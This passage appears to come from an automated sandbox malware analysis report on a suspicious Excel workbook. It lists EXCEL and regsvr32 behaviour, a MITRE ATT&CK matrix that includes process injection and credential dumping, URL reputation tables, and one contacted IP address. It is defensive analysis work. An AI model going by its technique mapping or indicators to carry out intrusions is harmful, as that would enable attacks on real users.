    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: regsvr32.exe, 0000000C.00000002.718805766.0000000004350000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 0000000C.00000002.718805766.0000000004350000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 0000000C.00000002.718805766.0000000004350000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 0000000C.00000002.718805766.0000000004350000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection1Regsvr321OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    transfer_summ_188108012.xlsb7%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
      high
      https://login.microsoftonline.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
        high
        https://shell.suite.office.com:1443169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
            high
            https://autodiscover-s.outlook.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                high
                https://cdn.entity.169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                      high
                      https://powerlift.acompli.net169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                        high
                        https://cortana.ai169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                  high
                                  https://api.aadrm.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                        high
                                        https://cr.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                            high
                                            https://graph.ppe.windows.net169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                            high
                                                            https://graph.windows.net169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                high
                                                                                                https://api.office.net169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://loki.delve.office.com/api/v1/configuration/officewin32/169CBBD9-A660-4E29-98C8-43AC6B26ED38.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    185.180.199.125
                                                                                                                                                    unknownNetherlands
                                                                                                                                                    14576HOSTING-SOLUTIONSUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:433175
                                                                                                                                                    Start date:11.06.2021
                                                                                                                                                    Start time:12:15:10
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 18s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:transfer_summ_188108012.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:25
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
